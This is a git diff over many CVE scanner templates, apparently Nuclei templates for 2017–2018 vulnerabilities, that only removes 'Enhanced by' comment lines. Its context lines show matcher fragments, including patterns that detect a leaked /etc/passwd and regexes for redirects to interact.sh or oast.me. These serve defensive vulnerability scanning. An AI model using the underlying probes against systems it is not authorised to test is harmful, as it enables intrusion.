b/http/cves/2017/CVE-2017-12794.yaml @@ -41,4 +41,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index c112d9132a..ef2aaa1c52 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 293ddf21e4..c70b6daddd 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/11 + diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index fee67e9967..39704d1866 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -31,4 +31,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# Enhanced by md on 2023/03/20 + diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 2a23bea903..498f7e1a20 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/01 + diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index db7aba4b69..77852b6eba 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -54,4 +54,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 3782c781d6..f62f6b20a3 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# Enhanced by md on 2023/03/13 + diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 34914adde6..9c8cafaa50 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -40,4 +40,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/04/14 + diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 688789f24c..5aadf04c1b 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -33,4 +33,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 779bc6d2cb..0db3c09730 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -31,4 +31,4 @@ http: words: - 'Unknown command: ' -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index f3459dd97f..684b9f9465 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 8a8bc3e34c..3de4572bf6 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index dd81fff9a4..c05054b9c2 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -49,4 +49,4 @@ http: dsl: - 'contains(body_2, "{{randstr_1}}")' -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 0214a720bf..a7586748f7 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 5277118f74..87121962d2 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -38,4 +38,4 @@ http: part: body -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index c529f65951..2f85ca3c43 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/09 + diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 03e3baec72..72d07351c9 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/20 + diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 4b29ab7a5c..99b983c389 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3c555a1287..06ee13b266 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 89f5659046..bde243a6f0 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index b09cf30970..9a8c872fa0 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -109,4 +109,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index ba7052be23..3c2786c563 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -41,4 +41,4 @@ http: - "SQLServer" condition: and -# Enhanced by cs on 2022/10/24 + diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index c4017b8bf3..688b2eb345 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -45,4 +45,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 2977c64992..69e1d81d7d 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 3bfe582f5f..3105e4a9cb 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -38,4 +38,4 @@ http: words: - "console.log" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 9b49688795..3e689d2374 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -33,4 +33,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 684bb51560..12b9ca667c 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -49,4 +49,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/20 + diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 4ce615dc71..5dd2874975 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -30,4 +30,4 @@ http: - 'noresize src="/\interact.sh?configName=' part: body -# Enhanced by mp on 2022/04/14 + diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index baf4d6e401..4cb1be3626 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -37,4 +37,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 0a3b332aad..47c4703c0a 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -56,4 +56,4 @@ http: - '.[] | .slug' - '.[].name' -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index d5efeff60d..f55f3321c6 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 2ab385eaac..075cd964dc 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index dc201eb144..d8f6c5d6a8 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by md on 2023/03/21 + diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 739b9c922f..b28d07f5c0 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/03 + diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index a9c26d89a5..81db0d2b4a 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 6053dc8635..777a206751 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/06 + diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 4705be0097..5737c5113a 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 3c822b61b2..baa48f30d8 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -40,4 +40,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 1b2c53866a..720a8b9d0f 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 6f513bbfcf..522e738c3e 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -35,4 +35,4 @@ http: - "application/xml" part: header -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index f9356b324d..6f679570c0 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -35,4 +35,4 @@ http: words: - '{{md5(num)}}' -# Enhanced by mp on 2022/09/28 + diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index b04f7bbdc6..d1d3358f1e 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -37,4 +37,4 @@ http: - 'Telerik.ReportViewer.axd?name=Resources' condition: and -# Enhanced by cs on 2022/02/28 + diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 1983fd0b04..3b9767a1e5 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index b161d35b87..02868fd71c 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -42,4 +42,4 @@ http: - "status_code == 200" condition: and -# Enhanced by md on 2023/04/12 + diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 6e2e90331f..fc43a2b56a 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -33,4 +33,4 @@ http: words: - "http" -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 229030e990..fee4538b02 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -53,4 +53,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index ed28aec5cd..d1e1b5198a 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -97,4 +97,4 @@ http: status: - 500 -# Enhanced by mp on 2022/04/20 + diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 5dfd9a1fc9..c7bdaefa69 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -43,4 +43,4 @@ http: status: - 404 -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 3b8e4cc83d..29d12b0a34 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index f5fd61dbc9..a8ffc2ba7d 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -77,4 +77,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 20cf63be67..42865d8e5c 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -40,4 +40,4 @@ http: - "cisco" - "admin" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 780954402b..da8bbe9ffc 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index acec68f593..cc6c08e46d 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 875b6212cb..09bbe031ef 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -46,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index d8623f2870..b3c820fbef 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -62,4 +62,4 @@ http: regex: - "(.*[a-zA-Z0-9].+==)" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index d91512d205..713e9a3018 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -49,4 +49,4 @@ http: - "root:/root:/bin/bash" part: body -# Enhanced by mp on 2022/04/08 + diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 1d81baecd1..28bc700f75 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -31,4 +31,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index f47b246cae..4b7441854e 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -31,4 +31,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 3ef3fee5a2..7ac55e8737 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -59,4 +59,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 58c9a0dac4..58d280b923 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index ae7850cca6..99c8705eed 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index a48cedb578..c394a5750b 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -41,4 +41,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index e4abee668d..1b848a4961 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 8ea50f6028..058e72da0a 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -37,4 +37,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 4a0b5e0a7d..e46aa3cf15 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index bd9c9b9bdf..b108a4dd55 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -49,4 +49,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index 1edb70826f..e4dea9ae2f 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -47,4 +47,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index c8a1f22abe..4f8bf37a6d 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c79a098cb8..4058148fe9 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index b835e0980d..50415fc702 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index adeefb5650..212943aab9 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index e06e44d201..a1ca48454b 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 8585e49182..ce12c1d88e 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -33,4 +33,4 @@ http: words: - licenseKeys -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b41176d8f4..a3a65ca447 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -63,4 +63,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index eee5aaeef9..eae46501ab 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/31 + diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 93c22ef257..296aa16c2c 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 + diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index e6a846c747..8542c2a01b 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index d56a1862bf..422cf2f318 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index e0b78e7118..04745153d6 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -32,4 +32,4 @@ http: - "calling init: /lib/" part: response -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 46608f3da5..bfe8b3b132 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 821163cf40..d151b265f8 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -39,4 +39,4 @@ http: regex: - '"version": "([0-9.]+)"' -# Enhanced by mp on 2022/07/05 + diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 7c93e7026e..2d1f8c82c6 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -29,4 +29,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index e069d71059..e0878f1466 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 1d35ec11eb..ed1f65bfa2 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 + diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 21456e18ad..2f7f4df9d4 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -32,4 +32,4 @@ http: words: - '' -# Enhanced by md on 2022/10/13 + diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 1bf600dd84..6c30a46f79 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index d4fcd63b8d..7f0d4c9713 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -41,4 +41,4 @@ http: words: - text/html -# Enhanced by mp on 2022/08/18 + diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index b33f9f2ed6..56abb9c8a0 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -51,4 +51,4 @@ http: status: - 200 -# Enhanced 